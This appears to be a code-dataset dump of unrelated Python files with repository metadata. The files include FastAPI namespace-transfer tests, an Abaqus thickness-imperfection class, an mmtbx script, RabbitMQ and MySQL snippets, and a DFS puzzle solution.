data2 = {"name": namespace2["name"], "region": namespace2["region"], "old_project_id": project["project_id"],
"new_project_id": project2["project_id"]}
response = client.post('namespace2projecttransfer/', data=json.dumps(data2))
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 3
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
app.dependency_overrides = {}
response = client.post('namespace2projecttransfer/', data=json.dumps(data))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_candidate_accept(client: TestClient, session, monkeypatch):
monkeypatch.setattr("app.api.routes.namespace2projecttransfer.get_user_list_by_id", get_user_list_by_id)
data1 = {"name": namespace1["name"], "region": namespace1["region"]}
app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user1
data_nonsense = {"name": "nonsense", "region": namespace1["region"]}
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace not found"
data3 = {"name": namespace3["name"], "region": namespace3["region"]}
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data3))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace is not transfer candidate"
app.dependency_overrides[current_user] = lambda: user3
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 401
assert response.json()["detail"] == "Project for user not found or user not admin"
role_bindings = rbac.list_namespaced_role_binding(namespace1["name"])
assert len(role_bindings.items) == 2
namespace1_e_mails = [item.subjects[0].name for item in role_bindings.items]
assert user1.email in namespace1_e_mails
assert user2.email in namespace1_e_mails
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 3
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
app.dependency_overrides[current_user] = lambda: user1
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 201
assert response.json() == {"name": namespace1["name"], "region": namespace1["region"],
"old_project_id": project["project_id"], "new_project_id": project2["project_id"]}
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
role_bindings = rbac.list_namespaced_role_binding(namespace1["name"])
assert len(role_bindings.items) == 2
namespace1_e_mails = [item.subjects[0].name for item in role_bindings.items]
assert user1.email in namespace1_e_mails
assert user3.email in namespace1_e_mails
app.dependency_overrides = {}
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_get_by_source_project(client: TestClient):
app.dependency_overrides[current_user] = lambda: user2.copy(update={"is_verified": False})
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project2["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user2
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project2["project_id"]}))
assert response.status_code == 404
assert response.json()["detail"] == "Project for user not found"
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 1
assert response.json()[0]["name"] == namespace2["name"]
assert response.json()[0]["region"] == namespace2["region"]
assert response.json()[0]["old_project_id"] == project["project_id"]
assert response.json()[0]["new_project_id"] == project2["project_id"]
app.dependency_overrides[current_user] = lambda: user1
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project3["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 0
app.dependency_overrides = {}
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_get_by_target_project(client: TestClient):
app.dependency_overrides[current_user] = lambda: user3.copy(update={"is_verified": False})
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user3
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 404
assert response.json()["detail"] == "Project for user not found"
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project2["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 1
assert response.json()[0]["name"] == namespace2["name"]
assert response.json()[0]["region"] == namespace2["region"]
assert response.json()[0]["old_project_id"] == project["project_id"]
assert response.json()[0]["new_project_id"] == project2["project_id"]
app.dependency_overrides[current_user] = lambda: user1
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project3["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 0
app.dependency_overrides = {}
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_get(client: TestClient):
data2 = {"name": namespace2["name"], "region": namespace2["region"]}
app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user1
data_nonsense = {"name": "nonsense", "region": namespace1["region"]}
response = client.get('namespace2projecttransfer/', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace not found"
app.dependency_overrides[current_user] = lambda: user3
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 404
assert response.json()["detail"] == "Project for user not found"
app.dependency_overrides[current_user] = lambda: user1
data1 = {"name": namespace1["name"], "region": namespace1["region"]}
response = client.get('namespace2projecttransfer/', data=json.dumps(data1))
assert response.status_code == 403
assert response.json()["detail"] == "Namespace is not transfer candidate"
app.dependency_overrides[current_user] = lambda: user2
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 200
assert response.json() == {"name": namespace2["name"], "region": namespace2["region"],
"old_project_id": project["project_id"], "new_project_id": project2["project_id"]}
app.dependency_overrides = {}
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_delete(client: TestClient, session, monkeypatch):
monkeypatch.setattr("app.api.routes.user_management.get_user_by_email", get_user_by_email)
monkeypatch.setattr("app.api.routes.user_management.get_user_by_id", get_user_by_id)
monkeypatch.setattr("app.api.routes.namespace2projecttransfer.get_user_list_by_id", get_user_list_by_id)
data2 = {"name": namespace2["name"], "region": namespace2["region"]}
app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user1
data_nonsense = {"name": "nonsense", "region": namespace1["region"]}
response = client.delete('namespace2projecttransfer/', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace not found"
data1 = {"name": namespace1["name"], "region": namespace1["region"]}
response = client.delete('namespace2projecttransfer/', data=json.dumps(data1))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace is not transfer candidate"
app.dependency_overrides[current_user] = lambda: user2
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "Project for user not found or user not admin"
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
app.dependency_overrides[current_user] = lambda: user1
response = client.put('project_user_management/admin_state',
data=json.dumps({"project_id": project2["project_id"], "user_id": user3.user_id, "is_admin": True}))
app.dependency_overrides[current_user] = lambda: user3
response = client.put('project_user_management/admin_state',
data=json.dumps({"project_id": project2["project_id"], "user_id": user1.user_id, "is_admin": False}))
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 200
assert response.json() == "No records remaining"
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
app.dependency_overrides[current_user] = lambda: user1
data2 = {"name": namespace2["name"], "region": namespace2["region"], "old_project_id": project["project_id"],
"new_project_id": project2["project_id"]}
response = client.post('namespace2projecttransfer/', data=json.dumps(data2))
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 200
assert response.json() == "No records remaining"
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
response = client.delete('projects/', data=json.dumps({"project_id": project["project_id"]}))
app.dependency_overrides[current_user] = lambda: user3
response = client.delete('projects/', data=json.dumps({"project_id": project2["project_id"]}))
| 21,303 | 0 | 207 |
f03a8a84ca05fb06e5190a7a160fe0079e5c60e9 | 85 | py | Python | starry/_core/ops/limbdark/__init__.py | fbartolic/starry | d50576caf964ad925c490c9f3ffe1273ab155397 | [
"MIT"
] | 116 | 2018-02-23T19:47:15.000Z | 2022-02-21T04:43:46.000Z | starry/_core/ops/limbdark/__init__.py | fbartolic/starry | d50576caf964ad925c490c9f3ffe1273ab155397 | [
"MIT"
] | 224 | 2018-02-26T00:41:51.000Z | 2022-03-29T10:38:16.000Z | starry/_core/ops/limbdark/__init__.py | fbartolic/starry | d50576caf964ad925c490c9f3ffe1273ab155397 | [
"MIT"
] | 25 | 2018-02-26T18:14:36.000Z | 2021-11-30T01:00:56.000Z | # -*- coding: utf-8 -*-
from .limbdark import LimbDarkOp
from .get_cl import GetClOp
| 21.25 | 32 | 0.717647 | # -*- coding: utf-8 -*-
from .limbdark import LimbDarkOp
from .get_cl import GetClOp
| 0 | 0 | 0 |
22236c2ae2d83019f7983fe4b2e734a91069694e | 5,221 | py | Python | desicos/abaqus/imperfections/ti.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-22T22:15:24.000Z | 2020-10-22T22:15:24.000Z | desicos/abaqus/imperfections/ti.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-09T12:42:02.000Z | 2020-10-09T12:42:02.000Z | desicos/abaqus/imperfections/ti.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 2 | 2020-07-14T07:45:31.000Z | 2020-12-29T00:22:41.000Z | from __future__ import absolute_import
import numpy as np
from desicos.abaqus.apply_imperfections import change_thickness_ABAQUS
from desicos.conecylDB import update_imps
class TI(object):
"""Thickness Imperfection
Assumes that a percentage variation of the laminate thickness can be
represented by the same percentage veriation of each ply, i.e., each
ply thickness is varied in order to reflect a given measured thickness
imperfection field.
"""
def calc_amplitude(self):
"""Calculates the thickness imperfection amplitude
Amplitude measured as the biggest difference between each layup
thickness and the nominal thickness of the Cone/Cylinder,
considering only the layups that are not suppressed.
.. note:: Must be called from Abaqus.
Returns
-------
max_amp : float
Maximum absolute imperfection amplitude.
"""
if self.created:
from abaqus import mdb
cc = self.impconf.conecyl
part = mdb.models[cc.model_name].parts[cc.part_name_shell]
max_amp = 0.
cc_total_t = sum(cc.plyts)
for layup in part.compositeLayups.values():
if not layup.suppressed:
layup_t = sum(p.thickness for p in layup.plies.values())
max_amp = max(max_amp, abs(layup_t-cc_total_t))
return max_amp
def create(self, force=False):
"""Creates the thickness imperfection
The thickness imperfection is created assuming that each ply has
the same contribution to the measured laminate thickness. Thus, a
scaling factor is applied to the nominal thickness of each ply in
order to macth the measured imperfection field.
Parameters
----------
force : bool, optional
If ``True`` the thickness imperfection is applied even when it
is already created.
"""
if self.created:
if force:
cc = self.impconf.conecyl
cc.created = False
cc.rebuilt = False
cc.create_model()
else:
return
cc = self.impconf.conecyl
imps, imps_theta_z, t_measured, R_best_fit, H_measured = update_imps()
if self.use_theta_z_format:
imperfection_file_name = imps_theta_z[self.imp_thick]['ti']
else:
imperfection_file_name = imps[self.imp_thick]['ti']
H_measured = H_measured[self.imp_thick]
R_best_fit = R_best_fit[self.imp_thick]
t_measured = t_measured[self.imp_thick]
cc = self.impconf.conecyl
self.elems_t, self.t_set = change_thickness_ABAQUS(
imperfection_file_name = imperfection_file_name,
model_name = cc.model_name,
part_name = cc.part_name_shell,
t_model = sum(cc.plyts),
t_measured = t_measured,
H_model = cc.H,
H_measured = H_measured,
R_model = cc.rbot,
R_best_fit = R_best_fit,
number_of_sets = self.number_of_sets,
semi_angle = cc.alphadeg,
stretch_H = self.stretch_H,
scaling_factor = self.scaling_factor,
num_closest_points = self.ncp,
power_parameter = self.power_parameter,
elems_t = self.elems_t,
t_set = self.t_set,
use_theta_z_format = self.use_theta_z_format)
from desicos.abaqus.abaqus_functions import set_colors_ti
set_colors_ti(cc)
self.created = True
print('%s amplitude = %f' % (self.name, self.calc_amplitude()))
ffi = self.impconf.ffi
if ffi is not None and ffi.created:
# There is already a FFI, let it know about us
ffi.update_after_tis()
return self.elems_t, self.t_set
| 35.277027 | 78 | 0.581498 | from __future__ import absolute_import
import numpy as np
from desicos.abaqus.apply_imperfections import change_thickness_ABAQUS
from desicos.conecylDB import update_imps
class TI(object):
"""Thickness Imperfection
Assumes that a percentage variation of the laminate thickness can be
represented by the same percentage veriation of each ply, i.e., each
ply thickness is varied in order to reflect a given measured thickness
imperfection field.
"""
def __init__(self):
super(TI, self).__init__()
self.name = 'ti'
self.imp_thick = ''
self.number_of_sets = None
self.stretch_H = False
self.ncp = 5
self.power_parameter = 2
self.scaling_factor = 1.
self.thetadeg = 0.
self.thetadegs = []
self.pts = []
self.index = None
self.use_theta_z_format = False
# plotting options
self.xaxis = 'scaling_factor'
self.xaxis_label = 'Scaling factor'
self.elems_t = None
self.t_set = None
self.created = False
def rebuild(self):
self.name = 'TI_%02d_SF_%05d' % (self.index,
int(round(100*self.scaling_factor)))
self.thetadegs = [self.thetadeg]
self.pts = []
def __setstate__(self, attrs):
# Old versions had a bug where self.xaxis was set to 'amplitude'
# Fix that during loading
if attrs['xaxis'] == 'amplitude':
attrs['xaxis'] = 'scaling_factor'
attrs['xaxis_label'] = 'Scaling factor'
self.__dict__.update(attrs)
def calc_amplitude(self):
"""Calculates the thickness imperfection amplitude
Amplitude measured as the biggest difference between each layup
thickness and the nominal thickness of the Cone/Cylinder,
considering only the layups that are not suppressed.
.. note:: Must be called from Abaqus.
Returns
-------
max_amp : float
Maximum absolute imperfection amplitude.
"""
if self.created:
from abaqus import mdb
cc = self.impconf.conecyl
part = mdb.models[cc.model_name].parts[cc.part_name_shell]
max_amp = 0.
cc_total_t = sum(cc.plyts)
for layup in part.compositeLayups.values():
if not layup.suppressed:
layup_t = sum(p.thickness for p in layup.plies.values())
max_amp = max(max_amp, abs(layup_t-cc_total_t))
return max_amp
def create(self, force=False):
"""Creates the thickness imperfection
The thickness imperfection is created assuming that each ply has
the same contribution to the measured laminate thickness. Thus, a
scaling factor is applied to the nominal thickness of each ply in
order to macth the measured imperfection field.
Parameters
----------
force : bool, optional
If ``True`` the thickness imperfection is applied even when it
is already created.
"""
if self.created:
if force:
cc = self.impconf.conecyl
cc.created = False
cc.rebuilt = False
cc.create_model()
else:
return
cc = self.impconf.conecyl
imps, imps_theta_z, t_measured, R_best_fit, H_measured = update_imps()
if self.use_theta_z_format:
imperfection_file_name = imps_theta_z[self.imp_thick]['ti']
else:
imperfection_file_name = imps[self.imp_thick]['ti']
H_measured = H_measured[self.imp_thick]
R_best_fit = R_best_fit[self.imp_thick]
t_measured = t_measured[self.imp_thick]
cc = self.impconf.conecyl
self.elems_t, self.t_set = change_thickness_ABAQUS(
imperfection_file_name = imperfection_file_name,
model_name = cc.model_name,
part_name = cc.part_name_shell,
t_model = sum(cc.plyts),
t_measured = t_measured,
H_model = cc.H,
H_measured = H_measured,
R_model = cc.rbot,
R_best_fit = R_best_fit,
number_of_sets = self.number_of_sets,
semi_angle = cc.alphadeg,
stretch_H = self.stretch_H,
scaling_factor = self.scaling_factor,
num_closest_points = self.ncp,
power_parameter = self.power_parameter,
elems_t = self.elems_t,
t_set = self.t_set,
use_theta_z_format = self.use_theta_z_format)
from desicos.abaqus.abaqus_functions import set_colors_ti
set_colors_ti(cc)
self.created = True
print('%s amplitude = %f' % (self.name, self.calc_amplitude()))
ffi = self.impconf.ffi
if ffi is not None and ffi.created:
# There is already a FFI, let it know about us
ffi.update_after_tis()
return self.elems_t, self.t_set
| 1,041 | 0 | 80 |
7bd1fe7f42a3682cdb3288d310d99445d1adcff0 | 727 | py | Python | mmtbx/command_line/development.aev.py | mphancock/cctbx_project | ec8a239c5bcee9c9b2d1c6c95dc3fff2580bbb85 | [
"BSD-3-Clause-LBNL"
] | null | null | null | mmtbx/command_line/development.aev.py | mphancock/cctbx_project | ec8a239c5bcee9c9b2d1c6c95dc3fff2580bbb85 | [
"BSD-3-Clause-LBNL"
] | 1 | 2020-05-26T17:46:17.000Z | 2020-05-26T17:55:19.000Z | mmtbx/command_line/development.aev.py | mphancock/cctbx_project | ec8a239c5bcee9c9b2d1c6c95dc3fff2580bbb85 | [
"BSD-3-Clause-LBNL"
] | 1 | 2022-02-08T10:11:07.000Z | 2022-02-08T10:11:07.000Z | from __future__ import absolute_import, division, print_function
# LIBTBX_SET_DISPATCHER_NAME mmtbx.development.aev
import sys
import time
import mmtbx
import iotbx.pdb
import mmtbx.model
from libtbx.utils import null_out
import mmtbx.atomic_environment_vectors as aev
if __name__ == '__main__':
main(*tuple(sys.argv[1:]))
| 26.925926 | 64 | 0.718019 | from __future__ import absolute_import, division, print_function
# LIBTBX_SET_DISPATCHER_NAME mmtbx.development.aev
import sys
import time
import mmtbx
import iotbx.pdb
import mmtbx.model
from libtbx.utils import null_out
import mmtbx.atomic_environment_vectors as aev
def main(filename, precision):
t0 = time.time()
pdb_inp = iotbx.pdb.input(file_name = filename)
model = mmtbx.model.manager(
model_input = pdb_inp,
build_grm = True,
log = null_out())
a = aev.AEV(model = model)
b = aev.compare(a)
print(b)
recs = aev.format_HELIX_records_from_AEV(b, float(precision))
print("\n".join(recs))
print('time', time.time()-t0)
if __name__ == '__main__':
main(*tuple(sys.argv[1:]))
| 378 | 0 | 23 |
a2463c67d96d75c3ab770a2e0bf79ca1214b2471 | 589 | py | Python | messageque/test-client.py | yafraorg/pythonsamples | 8f61292c89b497d4067d2fb1873e5281877901f3 | [
"Apache-2.0"
] | null | null | null | messageque/test-client.py | yafraorg/pythonsamples | 8f61292c89b497d4067d2fb1873e5281877901f3 | [
"Apache-2.0"
] | 3 | 2021-06-08T21:19:19.000Z | 2022-03-12T00:24:22.000Z | messageque/test-client.py | yafraorg/pythonsamples | 8f61292c89b497d4067d2fb1873e5281877901f3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import pika
#credentials = pika.PlainCredentials('guest', 'guest')
#parameters = pika.ConnectionParameters('amqp.k8sd.pax.ch', 80, '/', credentials)
#parameters = pika.URLParameters('amqp://guest:guest@localhost:5672/%2F')
#connection = pika.BlockingConnection(parameters)
connection = pika.BlockingConnection()
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='',
routing_key='hello',
body='Hello World! MWN')
print(" [x] Sent 'Hello World! MWN'")
connection.close()
| 29.45 | 81 | 0.694397 | #!/usr/bin/env python
import pika
#credentials = pika.PlainCredentials('guest', 'guest')
#parameters = pika.ConnectionParameters('amqp.k8sd.pax.ch', 80, '/', credentials)
#parameters = pika.URLParameters('amqp://guest:guest@localhost:5672/%2F')
#connection = pika.BlockingConnection(parameters)
connection = pika.BlockingConnection()
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='',
routing_key='hello',
body='Hello World! MWN')
print(" [x] Sent 'Hello World! MWN'")
connection.close()
| 0 | 0 | 0 |
3629443222f0af2943cff48dbd1a24e656c4da71 | 648 | py | Python | advance/creat_table.py | naeimnb/pythonexersices | 94761d5a954c5f6a710baf4ea5f2be57f110c13e | [
"Apache-2.0"
] | null | null | null | advance/creat_table.py | naeimnb/pythonexersices | 94761d5a954c5f6a710baf4ea5f2be57f110c13e | [
"Apache-2.0"
] | null | null | null | advance/creat_table.py | naeimnb/pythonexersices | 94761d5a954c5f6a710baf4ea5f2be57f110c13e | [
"Apache-2.0"
] | null | null | null | import mysql.connector
from mysql.connector import errorcode
try:
con = mysql.connector.connect(user='niminimda', password='123456', host='127.0.01', database='test')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("something is wrong with user or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("db doesn't exists")
else:
print(err)
else:
my_function()
con.close()
| 25.92 | 104 | 0.683642 | import mysql.connector
from mysql.connector import errorcode
def my_function():
query = "CREATE TABLE employee (Name nvarchar(20), Weight int, Height int)"
cursor = con.cursor()
cursor.execute(query)
cursor.close()
try:
con = mysql.connector.connect(user='niminimda', password='123456', host='127.0.01', database='test')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("something is wrong with user or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("db doesn't exists")
else:
print(err)
else:
my_function()
con.close()
| 148 | 0 | 23 |
15551d605e398d1d5310dd0fd20056331d6f635a | 4,042 | py | Python | BatchThread.py | benblackcake/srgan_t1 | 5724df5aff8901f8044d65d8d46ee37b6e2e08cd | [
"MIT"
] | null | null | null | BatchThread.py | benblackcake/srgan_t1 | 5724df5aff8901f8044d65d8d46ee37b6e2e08cd | [
"MIT"
] | 8 | 2020-09-26T00:46:21.000Z | 2022-03-12T00:17:59.000Z | BatchThread.py | benblackcake/srgan_t1 | 5724df5aff8901f8044d65d8d46ee37b6e2e08cd | [
"MIT"
] | null | null | null |
import numpy as np
# A simple generator wrapper, not sure if it's good for anything at all.
# With basic python threading
import threading
# from threading import Thread
import multiprocessing as mp
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
# ... or use multiprocessing versions
# WARNING: use sentinel based on value, not identity
from multiprocessing import Process, Queue as MpQueue
from utils import *
class ThreadedGenerator(object):
"""
Generator that runs on a separate thread, returning values to calling
thread. Care must be taken that the iterator does not mutate any shared
variables referenced in the calling thread.
"""
| 32.079365 | 97 | 0.563582 |
import numpy as np
# A simple generator wrapper, not sure if it's good for anything at all.
# With basic python threading
import threading
# from threading import Thread
import multiprocessing as mp
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
# ... or use multiprocessing versions
# WARNING: use sentinel based on value, not identity
from multiprocessing import Process, Queue as MpQueue
from utils import *
class ThreadedGenerator(object):
"""
Generator that runs on a separate thread, returning values to calling
thread. Care must be taken that the iterator does not mutate any shared
variables referenced in the calling thread.
"""
def __init__(self, iterator_train,
# iterator_label,
batch_size,
queue_maxsize=1000,
random_crop=False,
Thread=threading.Thread,
Queue=Queue):
self.iterator_train = iterator_train
self.random_crop = random_crop
self.batch_size = batch_size
self._queue = Queue(maxsize=queue_maxsize)
#self._thread = mp.Process(target=self._run)
self._thread = Thread(
name=repr(iterator_train),
target=self._run
)
self.__iter_time = 0
#self._thread.daemon = daemon
def __repr__(self):
return 'ThreadedGenerator({!r})'.format(self.iterator_train)
def _run(self):
try:
# for value in self._iterator:
# self._queue.put(value)
batch_gen = self._gen_batches()
# loop over generator and put each batch into the queue
#print("__batch_gen_shape__%s"%batch_gen.shape)\
#print("__batch_gen")
#print(batch_gen)
for data in batch_gen:
self._queue.put(data, block=True)
#print("__queue__size__:%d "%(self._queue.qsize()))
# once the generator gets through all data issue the terminating command and close it
self._queue.put(None)
finally:
pass
# self._queue.put(self._sentinel)
def _gen_batches(self):
num_samples = len(self.iterator_train)
idx = np.random.permutation(num_samples)
batches = range(0, num_samples - self.batch_size + 1, self.batch_size)
print("_gen")
i=0
e_i =0
for batch in batches:
tmp_ = []
X_batch = self.iterator_train[batch:batch + self.batch_size]
for data in X_batch:
try:
img = process_sub_image(data,random_crop = self.random_crop)
#checkimage(img)
tmp_.append(img)
#print(tmp_)
except:
e_i+=1
#print("__except__time:%d data:%s"%(e_i,data))
continue
#print(img.shape)
# y_batch = self.iterator_label[batch:batch + self.batch_size]
i+=1
#print("__iter__data__batchs: %s"%i)
self.__iter_time += 1
# do some stuff to the batches like augment images or load from folders
#print("__except__time:%d"%(e_i))
tmp_ = np.asarray(tmp_)
#print(tmp_.shape)
yield [tmp_]
def get_iter_time(self):
return self.__iter_time
def __iter__(self):
c = 0
print("thread start...")
self._thread.setDaemon(True)
self._thread.start()
# load the batch generator as a python generator
# print(threading.get_ident())
# print(self._thread.ident)
#print("_iter_")
# self._queue.close()
for value in iter(self._queue.get, None):
c += 1
#print("__DEBUG__iter__%s" % c)
#print("pading.......")
yield value[0]
self._thread.join()
| 3,159 | 0 | 173 |
64687db7ce144774262e73c9d4fbce33876ba457 | 667 | py | Python | problem/01000~09999/01520/1520.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-19T16:37:44.000Z | 2019-04-19T16:37:44.000Z | problem/01000~09999/01520/1520.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-20T11:42:44.000Z | 2019-04-20T11:42:44.000Z | problem/01000~09999/01520/1520.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 3 | 2019-04-19T16:37:47.000Z | 2021-10-25T00:45:00.000Z | import sys
sys.setrecursionlimit(100000)
m,n=map(int,input().split())
dp=[[-1]*(n+2) for i in range(m+2)]
visit=[[False]*(n+2) for i in range(m+2)]
field=[0]*(m+2)
field[0]=[11111]*(n+2)
field[m+1]=[11111]*(n+2)
for i in range(1,m+1):
field[i]=[11111]
field[i].extend([*map(int,input().split())])
field[i].append(11111)
print(DFS(1,1)) | 19.617647 | 63 | 0.565217 | import sys
sys.setrecursionlimit(100000)
def DFS(i,j):
global m,n,dp,field,visit
if i==m and j==n: return 1
if dp[i][j]!=-1: return dp[i][j]
visit[i][j]=True
dp[i][j]=0
for di,dj in [[1,0],[-1,0],[0,1],[0,-1]]:
if field[i+di][j+dj]<field[i][j] and not visit[i+di][j+dj]:
dp[i][j]+=DFS(i+di,j+dj)
visit[i][j]=False
return dp[i][j]
m,n=map(int,input().split())
dp=[[-1]*(n+2) for i in range(m+2)]
visit=[[False]*(n+2) for i in range(m+2)]
field=[0]*(m+2)
field[0]=[11111]*(n+2)
field[m+1]=[11111]*(n+2)
for i in range(1,m+1):
field[i]=[11111]
field[i].extend([*map(int,input().split())])
field[i].append(11111)
